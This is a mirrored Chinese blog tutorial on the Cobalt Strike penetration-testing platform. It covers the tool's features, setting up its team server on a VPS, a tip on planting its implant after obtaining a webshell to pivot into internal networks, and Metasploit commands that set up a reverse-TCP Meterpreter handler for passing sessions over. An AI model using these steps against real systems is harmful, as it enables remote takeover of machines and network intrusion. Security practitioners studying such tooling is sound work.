zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    0x01 介绍

    Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。

    Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等

    0x02 安装

    CS是分成客户端和服务端的,我们可以在我们的VPS上安装服务端。 但是先要安装 jdk

    sudo apt-get install openjdk-8-jdk

    将cs 下载好。自己找资源 下载,,给权限。 马赛克是公网VPS的IP。 5555是连接密码。。。kali后台不可以关哈

     就在客户端上,直接连接就行了。 隐私。。

     

     

     一个简单的cs上线

     

     tips:在我们内网渗透的时候哈,拿到webshell了,可以的话直接上cs马,在cs上开socks代理,直接搞内网。舒服的一比。。。

    与Metasploit进行联动

    Cobalt Strike → Metasploit

    Cobalt Strike获得了一个上线机器,想把这个机器传给Metasploit中的meterpreter,获得一个session进行控制。在Metasploit执行以下命令:

    use exploit/multi/handler 
    set payload windows/meterpreter/reverse_tcp #不要用x64的payload
    set lhost 192.168.40.129
    set lport 63
    run -j

    之后使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。

     

    然后选中计算机,右键->新增会话,选择Metasploit的监听器:

    这个时候可以看到,Metasploit上的监听已经上线,现在可以对meterpreter获得的session进行控制。

  • 相关阅读:
    键盘事件
    鼠标移动事件(跟随鼠标移动的div)
    取消事件向父级或更高级冒泡
    关于document
    多物体运动2(几种运动共用一套)
    Javascript 多物体淡入淡出(透明度变化)
    第四周作业二_单元测试
    第四周作业四_例行报告
    第四周作业一_代码规范
    第三周作业三
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/11789791.html
Copyright © 2011-2022 走看看